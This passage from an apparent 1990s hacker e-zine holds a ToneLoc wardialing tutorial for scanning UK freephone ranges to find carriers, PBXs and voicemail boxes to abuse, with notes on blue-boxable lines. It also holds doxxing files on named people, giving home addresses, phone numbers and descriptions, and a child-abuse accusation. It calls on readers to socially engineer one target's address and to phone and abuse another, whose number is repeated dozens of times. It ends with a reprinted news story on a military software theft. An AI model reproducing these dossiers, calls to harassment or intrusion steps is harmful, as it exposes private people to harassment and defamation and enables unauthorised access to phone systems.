ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. Wardialing in the UK : Jf ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Wardialing in the UK, for me, is a very interesting subject. Although a lot of the modern c0de kiddies consider it "old-sk00l" and see it as no use today, Wardialing is actually, in my opinion, one of the greatest Hacking related things to do. Hacking a Webpage is fun yes but an isolated carrier provides much more entertainment and excitement, and via wardialing we aim to find these carriers along with lots of other cool things which will provide the phun. All the time, I am approached and people ask me HOW TO wardial in the UK, I always tell people its the same as in the UK, but people act so confused about the whole idea of UK Wardialing. Basically the little Windoze kiddies see some old wardialer, try it out and find that the area code to enter is only allowed to be up to 3 numbers long, therefore a US area code, with this they panic and cry out for help. Or they download a version of ToneLoc and PANIC because they do not understand the program, which CAN be used for UK wardialing and its the one I always use. This is where this help file is intended to come in useful, it will guide you through the basics of wardialing in the UK, and what you will find on your journey and it will also guide you with using Toneloc succesfully to scan loads of numbers and gain interesting results infinding carriers, VMBs, PBXs and numerous other interesting things. ############## Where to start ############## Wardialing is the process of scanning a large range of numbers and finding interesting things, as I have already stated. There are literally thousands of Carrier Tones in England which all perform different tasks and are owned by different companies. For example - Banks (yes BANKS, hehe), Libraries (delete those excess fines) Local Government (piss off your council) ..and loads more big companies and organisations. It may sound like a little movie-style picture of hacking (WARGAMES comes to mind) but its REAL, it does exist and people do mess with this sort of thing, hehe. Certain Carrier tones can also be abused and be setup so that you can connect perfectly to the Internet which will result, if the carrier is located within a FREE CALL netw0rks, in an 0800 dialup. People tend to mainly wardial for carrier tones but VMBs and PBXs can be found by Wardialing as well, so wardialing provides a great use for Phreaks who are interestedin these things. Although I personally haven't found an PBX while wardialing for about 6 months but, someone, somewhere will no doubt be finding one and abusing one as I type. VMBs are common findings while wardialing, especially on FREE CALL netw0rks and I have great phun with these. The 0800/0500 Service Network numbers, which are of course FREE, are the best place to start wardialing due to the LARGE percentage of businesses who have carriers located on them, to transfer data from area to area at low cost (only rental of number). It is also a lot safer to wardial than normal area codes because you will not be dialing peoples houses, so you can dial 0800/0500 numbers at night and not be waking people up (not that I care, its just that they might report the wardialing call to BT as a nuisance call). If you like the idea of Blueboxing then the 0800 89 **** number block will interest you. As you may already know, this block of numbers act as the COUNTRY DIRECT numbers, with some being boxable. From wardialing you will be able to note which ones are boxable if you listen into the wardialing progress, as boxable numbers (CCITT5 Lines) will give a little series of bleeps when they pickup, these are instantly recognisable and if you here this you will know that it is boxable. Well thats a basic introduction into the uses of Wardialing in the UK, so how bout it? Are you ready to step into this world? This is the real deal and could land you in a lot more trouble than a webpage hack, no doubt most people reading this will have already delved into wardialing as it is nothing new but some newbies to the subject might be a little misguided about the whole wardialing deal... ####### ToneLoc ####### Yes, This is the wardialer that I recommend for wardialing in the UK, it is however one of the mose complicated to understand if you have never used it before, but this section will explain how to use ToneLoc to its full capabilities and get scanning straight away. A download URL for ToneLoc is provided in the *URLs* section of this paper. Right, lets get started...We will keep the example simple by using the same variables throughout this section. When you are actually doing your own wardialing you will of course need to change these variables. People who have read the ToneLoc User Docs may find some of this familiar but some people DO NOT realise that the examples in the user docs CAN be interpreted into UK use. For this papers example we are going to scan the 0800 666 *** range which will provide us with 100 results. It is easy to make this scan A LOT bigger but for times sake we are going to look at this example now. Now we have discussed the variables of this example we can get down to using ToneLoc. First of all you need to restart your computer in DOS m0de and enter the ToneLoc directory. The First thing you need to do is to set the CONFIGURATION SETTINGS to what you require. So, open TLCFG.EXE and you will see 6 menus at the top of the screen. The *FILES* menu is used to change any log files that are used in the program. You can edit the names of these log files from this menu but its easiest to keep the names the same, from this menu you can easily see what the function of each .log file is. The *MODEM STRINGS* menu is used to setup the modem sequence for dialing etc. Here is where you need to enter your dialing prefix (0800) so that the program understands our range. The *MODEM OPTIONS* menu is for your modem settings such as Com Port, Baud Rate, IRQ etc. I would recommend setting your baud rate at 19200 even if you have a faster modem, the program (due to being 4 yrs old) doesn't seem to like any baud rate above 19200. The *SCAN OPTIONS* are the options which you may want to change which affect what it happening during the scan. eg. Sound, Wait Delay etc. I would recommend the Wait Delay being quite small to make the scan run faster but remember to keep it long enough for lines to pickup and for ToneLoc to register whether the line is a carrier, PBX, VMB, or Normal Line. The *COLORS* menu is just for editing the colors of the program. Nothing major to worry about. And finally, the *QUIT* menu is where you can chose to save or abort changes made to the configuration file. If you have looked through all those menus you will see that there is a lot of different things that you can change and play with and by now, you should know which ones to change to suit your UK Wardialing needs. Now that you should have all the configuration of ToneLoc setup SPECIFICALLY for your scanning needs we can get down to some major wardialing. If it is your first time using ToneLoc you will need to just open TONELOC.EXE and read the stuff it brings up. As you can probably see, there are LOTS of parameters within ToneLoc that can be used when scanning. ToneLoc allows for a lot of user choice which is something that attracts me to using it. For example, you can easily program the number range to scan and the number range to exclude from the scan by just selecting a different parameter. To scan a range of numbers in the 0800 prefix - eg. 0800-666-100 <--> 0800-666-200 the command at the DOS prompt would be :- TONELOC 666-XXX /R:100-200 This would then scan all the numbers between 0800-666-100 and 0800-666-200 and log the results into the log files specified in the *FILES* configuration menu. This is the option I use the most and its the parameter I recommend you get to know well. Next, suppose you want to scan all the numbers between 0800-666-000 and 0800-666-999, but you had already scanned the 0800-666-100/200 section in your last scan. This is where the EXCLUDE parameter comes into use. TONELOC 666-XXX /D:100-200 This would result in you scanning all numbers 0800-666-000 <--> 0800-666-999 Excluding 0800-666-100 <--> 0800-666-200 If you look at the ToneLoc User Guide included in the tl110.zip you will see this explained as well as lots of other ways to scan. Another Favourite of mine is to use the following command line. TONELOC 666-XXX This will scan 0800-666-000 <---> 0800-666-999 and it will save the results to the data file 666-XXX.dat. You must always remember to have the correct variables added into the Configuration program. Now that you know the basic and most used parameters of ToneLoc its time to get Wardialing. If you watch a wardialing session you will see that it seperatly dials each number and tells you whats happening on screen. It will tell you when it finds anything interesting such as a *gasp* Tone, a Carrier or a Voice and it also appends the results to the log file so you can remember the numbers of interesting stuff and go back and play with them later. You must remember that the fun does not end at Wardialing, a lot of people find wardialing and scanning boring, but I find it one of the more interesting parts of Hacking/Phreaking as you never know when your going to be lucky enough to jump upon a neat carrier (for a bank, hehe), a PBX or a VMB, the fun starts here. You need to follow all your wardialing findings up and learn how to use what you have found in a way which benefits you, after all isn't that the aim? #### URLs #### Below are the necessary URLs to download ToneLoc and maybe find out more information about Wardialing in general. First of all you will NEED a copy of ToneLoc (the wardialer I am recommending) http://www.linenoise.org/philez/wardialers/tl110.zip Now that you have started Wardialing in the UK, how about sharing some of your findings or finding people who may help you on your quests and related projects. The Linenoise WWWBoard is a place for this to come to life. http://www.linenoise.org/wwwboard/ ### End ### Well, thats all the Information that you need to get you going with Wardialing in the UK and using ToneLoc successfully, just be careful and remember that you're responsible if you fuck up, you cannot blame me, the teacher is not to blame. In the near future I would like to c0de a Wardialer specifically for the UK, which would be easy to use, understand and gain successful results from. It is a project that I always keep on the back burner but if enough people wanted to see it, I might bring it foward, let me know... Jf_ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. p0sse.rolodex (mad outdated anyway) : juurigaveitout ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Alan Wilson (aka. "w1ng") 58 Moon Drive 215-305-8379 Morrisville, PA 19069 215-736-1863 Drexel University 215-752-1324 wing@dunx1.ocs.drexel.edu Known Sites: *.drexel.edu, *.rutgers.edu, *.delphi.com. Short brown hair, brown eyes. Approximately 5'10 130 pounds. Very scrawny appearence. Roughly 19 to 20 years old. Commutes to Drexel University from his home in Morrisville. Computer Science major. Works part time doing Data-Entry. Egomaniacle, novice UNIX experience, short-tempered, hostile and arrogant. Logs: [dunx1.ocs.drexel.edu] Login name: wing In real life: Wong Ing Directory: /home/dunx1/under/wing Shell: /bin/sh Last login Fri Feb 25 19:21 on ttyqf from gandalf.rutgers.edu New mail received Sat Feb 26 12:00:09 1994; unread since Fri Feb 25 19:27:18 1994 No Plan. ______ Don Neumann (aka. "peaboy", "speedin") 7340 Hayward Drive 216-656-1912 Chardon, Ohio 216-650-5181 Known Sites: *.DELPHI.COM, *.MsState.edu, *.wustl.edu 16-17 years of age. Dropped out of his local High School his Senior year. Works part time as a desk clerk at a local motel. He is not attending a college, and presumably has no GED. _____ Steven Dake (aka. "riley" "renegade bit head" "rbh") 1731 North Fairway Flagstaff, Arizona 86011 602-526-9184 North Arizona University (NAU.EDU) Email unknown. Known Sites: herbon.connected.com, *.NAU.EDU, *.CS.UTC.EDU, ballison.extern.ucsd.edu, *.caltech.edu. Appearance unknown. Approximately 20-23 years of age. Computer Science major, second of third year. He lives on campus in the dormitories. His parents reside at the North Fairway address. He often comes out of UTC.EDU and CONNECTED.COM., _____ Greg Perry (aka. "z00m" "digital hitler" "j00" "gary" "Gary Seven") Known Sites: *.cftnet.com _____ Lane Davis Jr. (aka. "merc") Phoenix, Arizona 602- Known Sites: NAU.EDU, indirect.com, internet.com, _____ (aka. "Sciz") Known Sites: *.drexel.edu 6'10 155, very scrawny. Short permed blonde hair, blue or green eyes. Freshman or Sophomore at Drexel University. Lives in a dormitory on campus. Good friends with Alan Wilson. He rides an unregistered Honda Motorcycle. _____ Scott (aka. "X") Known Sites: CAPELLA.CS.UTC.EDU, HOBBES.CS.UTC.EDU, EXPLORER.CS.UTC.EDU. Email: X@capella.cs.utc.edu He attends and apparently administers part(s) of the CS.UTC.EDU school and domain. He has Brown hair, small build, 5'9" tall, about 155 pounds, brown eyes. _____ Chris Fisher (aka. "y", "Y-W1nD0z3") Known Sites: uahcs2.cs.uah.edu, grendel.cs.uah.edu, tycho.cs.uah.edu Email: cfisher@uahcs2.cs.uah.edu Very egomaniacle. Known for harassing CERT in news groups: ] X-News: uqvax comp.security.unix:4675 ] From: crfisher@nyx10.cs.du.edu (I am being repressed.) ] Subject:Cert; my what a witty bunch. ] Date: Mon, 11 Apr 94 19:52:33 GMT ] Message-ID:<1994Apr11.195233.17351@mnemosyne.cs.du.edu> ] ] Once again cert proves what a great bunch of guys they are. I guess they had ] never heard of gnufinger before...isn't it amazing that some people still ] respect them? Logs: *** irc.netsys.com : Thursday April 21 1994 -- 22:30 -07:00 *** y is root@deimos.cs.uah.edu (root) *** on channels: #tacobell @#fedz @#lifesux *** on irc via server irc.math.ufl.edu (The Happiest Server on IRC) _____ Oliver Friedrichs (aka. ][ceman) Known Sites: bova.cc.umanitoba.ca Email: umfriedr@bova.cc.umanitoba.ca He is Canada local, he dials into "umfriedr.dial.umantobia.ca" and from there likes his accounts at various machines in the cc.umanitoba.ca domain. _____ (aka. "N0-D0Z3") Known Hacked Sites: stdkrl@pip.shsu.edu This guy is a mystery. He is very malicious. He has apparently hacked all sorts of a long list of sites. He is currently (940421) on the "west coast" but is moving to Pittsburg next month. Logs: *** irc.netsys.com : Thursday April 21 1994 -- 18:30 -07:00 *** X is ~X@CAPELLA.CS.UTC.EDU (X) *** on channels: #tacobell *** on irc via server Copper.Ucs.Indiana.Edu ([129.79.1.4] Indiana +Experimental ALPHA AXP Server) *** N0-D0Z3 is stdkrl@pip.shsu.edu (KATRINA RUTH LOUNSBERRY) *** on channels: #tacobell *** on irc via server irc-2.mit.edu (Mass. Institute of Technology, Cambridge, +MA, USA) well, u guyz missed alot.. I came about this: --><-- close to +getting my ass busted... I sorta did get busted actually.. I fuckin broke into the high school where I lived and stole some +kewl shit... they found out it was me some how, and I split. they got my picture plastered all over where I used to live.. fuck +wantedand all that shit.. ehehe.. oh well.. I still got me a 386DX-40 out of +it. I took two full machines(cases) and one monitor. X:I went the first night and got two machines.. full cases etc, one +monitor and a keyboard... I went back not the next night, but the night after, and got all the +processors, the 1 gig HDD's from the two servers, novell netware boxed set, +and then a camcorder and cd-rom from the library.. I came back to my house at about 3:00 am and my mom was home, so I +fucking hid the shit behind the apartments and went to my friends who went +with me and slept at his house, and when I went home the next day, suprise, +it was all gone. *** irc.netsys.com : Thursday April 21 1994 -- 18:31 -07:00 _____ (aka. "Dynastar") He attends Carnegie Mellon University studying Mathematics (applying for CS major there). He is very fluent in 8051 Assembly (motorola) and is a major Cellular Phone modification jockey. He is probably one of the best at this, and his Cellular mod for th He is one of these people: [unix6.andrew.cmu.edu] dsa3 David Reeve Sward *p1 Thu 15:15 jl6b Jesse L. Liu p2 Thu 16:56 jc7o Joo C. Chung p3 Thu 21:20 jmdk Jason C Miller p4 Thu 18:42 mh5u Mathew Henson pb Thu 21:47 _____ Evan Baker (aka. "Nightstriker") voice: +1 301 390 1097 High School Student Lives close to the campus of University of Maryland College Park. Big UMD.EDU and GMU.EDU hacker. Past relations with various "posse" members. _____ (aka. "Vaxbuster") This may not be his real name, but this is the account he uses every time. [unixd3.cis.pitt.edu] Login name: cxzst1 In real life: Cheng Zhao Directory: /afs/pitt.edu/usr66/cxzst1 Shell: /bin/bash Address mail to: cxzst1+@pitt.edu Affiliation: Universal Student Computing [Provost] Account used on Wed Apr 20 16:23 (1 day 9 hours ago). No new mail; last read Tue Apr 5 23:34 (16 days ago). Plan: Home Phone : 291-6799 _____ Louis (aka. "Clovis") Known accounts: afo3cmm@cabell.vcu.edu DC/VA/MD Local. Attends 2600 meetings regularly. Very blonde hair, blue eyes. About 5'11 inches, dresses funny, about 130-135 pounds. Not attending school currently. _____ _____ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. RLoxley, first class fuckwit (and fatboy) : WH0 GN0Z? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ There is a user on the Undernet IRC network called "RLoxley", he is a lame fuq, he is also very fat, a compulsive liar, and child abuser.. He even moved house because of the abuse he was getting because of the way he treats his two daughters (RLoxley is around 40 btw). These are his old d0x from the 0wned.rolodex : Handles : RLoxley, RLox1ey, op in #hackphreak on UnderNet. Name : Kent Browne Phone : (914) 628-6281 Address : 29 Mcgregor Drive Mahopac, NY 10541 - E-Mail : mageus@bestweb.net - Wife's Name : Colleen Browne - Other Family : Two daughters, one aged 6, the other is 2 months old, RLoxley abuses them on a daily basis.. If anyone socially engineers the people living at his old address for his new mailing address and even a phone number, we will be mad impressed. Here is an IRC log of so1o making RLoxley look like a fag.. (Malaka == RLoxley) *** savec0re (~savec0re@zphn1-p107.worldonline.nl) has left #rhino9 heh i just did something neat in #hackphreak heh *** o1os is now known as os1o *** os1o is now known as savec0re *** Malaka (mageus@x2-7.katonah.bestweb.net) has joined #rhino9 where did pussy boy go? *** so1o has quit IRC ? you mean so1o rlox? yes, he is a wimp *** Malaka is now known as RLox1ey bbl [13:57] "RLoxley is looking for nominations on his new friends, please call 1-800-fagchat now and cast your vote" now that he cant find me any more this is what he resorts to * su1d is away, auto-gone [tv/l] *** chameleon (333@cx640648-a.msnv1.occa.home.com) has joined #rhino9 *** SyndIcate sets mode: +o chameleon *** chameleon sets mode: +o savec0re *** savec0re is now known as so1o *** so1o sets mode: +b *!*@x2-7.katonah.bestweb.net *** RLox1ey was kicked by so1o (he0ahe0ahah0aha) HAHAHAHAHAHHAHAA WHAT A LAME FUQ Anyway, someone pull his new d0x.. mail them to tk85@hotmail.com or /msg so1o on any IRC network.. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. Carolyn Meinel d0x : savec0re ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Carolyn Meinel, unless you didn't already know, runs the happyhacker mailing list for lame fuqz with no sk1llz, she herself however, also has no sk1llz, and so is classified by the el8 board of classification is a LAME FUQ. Phone her up and abuse her today.. (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 (505) 281-9675 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. MOD break DISN : Wired News ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ In what may be one of the first demonstrations of the potential of cyber warfare, an international cracking group claims it has stolen a suite of programs used to run classified US military networks and satellites. The group, calling itself Masters of Downloading, or MOD, said in a statement that it had stolen the software -- the Defense Information Systems Network Equipment Manager (DEM) -- from the Defense Information Systems Agency, the branch of the Defense Department in charge of classified computer networks. "This may help you to realize the reality of the threat of information warfare against the United States of America, as well as the DEM software's obvious value to certain global organizations and individuals," said the statement, which was supplied to Wired News by an anonymous representative of the group. The statement detailed the capabilities of the DEM software, and was accompanied by a number of image files that depicted the program's interfaces. The software's authenticity was confirmed by John Vranesevich of the computer security site AntiOnline. Vranesevich said he obtained a copy from MOD last Thursday and tested it after first unplugging his computer from the Internet. Vranesevich, who has tracked the computer underground for five years, said that the theft of a classified network control program pointed to a threat far more serious than the routine Web server intrusions of recent months. "This is one of the first times we've seen a group of hackers whose goal was not to commit acts of Internet graffiti by defacing low-security Web pages, but [instead] to actually target, plan, and retrieve software suites designed for military use," said Vranesevich. Last month, Vranesevich was the first to interview Ehud Tenebaum, the Israeli teen at the center of a federal investigation into widespread attacks on US military computer systems. But those attacks pale in comparison, he says. "[The deliberate theft of classified software] puts this group on a whole other playing field," said Vranesevich, who added that the group is comprised of 15 individuals, including eight Americans, five Britons, and two Russians. The group is not affiliated with Tenebaum, known as the Analyzer. MOD said that the software is used to remotely monitor and manage military computer-related equipment, including routers, repeaters, switches, military communication networks, and GPS satellites and receivers. The suite's top-level interface is designed to "manage all the computer-related equipment used by the United States military," the statement read. With the DEM software, the group claims, the entire Defense Information Systems Network could be shut down for a period of time. "This is definitely not a good thing for the United States military, as they depend heavily on their computer systems and networks to quickly share data and information from anywhere in the world," the statement said. MOD went into detail over two particular software components, one of which allows a user with access to monitor or shut down T1 links used by the military. The other program concerns Global Positioning System satellites, which are used to establish precise coordinates for weapons targeting and the navigation of commercial aircraft. "Although the DEM software cannot be used to send data to the GPS satellites, it can be used to track the satellites and pinpoint their exact whereabouts, as well as the frequency ranges they use and other operational information," said the MOD statement. MOD claims it first obtained the software in October 1997 but did nothing with it at first, to be sure that they were not being tracked. Although the Defense Information Systems Agency public affairs office declined to comment, a mission statement on the agency's Web site clarifies its role within the Department of Defense: "DISA will be the preeminent provider of information systems delivery support to our warfighters and others as required by the DoD, under all conditions of Peace and War." MOD members were not immediately available for comment, either, but in an interview with Vranesevich last Friday, group members said their intentions were not hostile. "We have the power to do so, but at this time we have no intentions to launch such a [network] attack," a member told Vranesevich. Another member also told Vranesevich that he had obtained a separate piece of software used to communicate with submarines. Gene Spafford, director of the Computer Security Research Center, COAST, said that the intrusion, if true, didn't surprise him. "I don't think anyone who is familiar with government security has ever believed it to be as secure as claimed," Spafford said. Spafford added that he was not familiar with DISA systems, but that any distributed system is vulnerable, and that many government systems are configured "for convenience and not need." The group claimed that they stole the software from a Windows NT server at DISA, and that about 30 individuals worldwide presently have copies. "When you have a system that is distributed such that others can manipulate it, you open it up to not just security problems but also erroneous operations," Spafford said. "[You get] people who don't have training and [you get] accidents. It is a standard systems design question." In an interview with Vranesevich, the group offered some network security advice for the US government. "It's simple: take all [classified] military systems off the Internet, place only [unclassified] Web servers on the Internet [and] keep the rest on a purely internal network," the MOD member said. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ _ /| k0dek4t sez... \'o O' =(_o_)= "EyEm HuNGaRy FoR SKiLLz, U nOt CaTf00d!!#@" ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ r00td0wn r00tsux r00tsick m00ksr00t fr00tl00ps r00tyt00ty vr00mvr00m r00tg0b00m ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ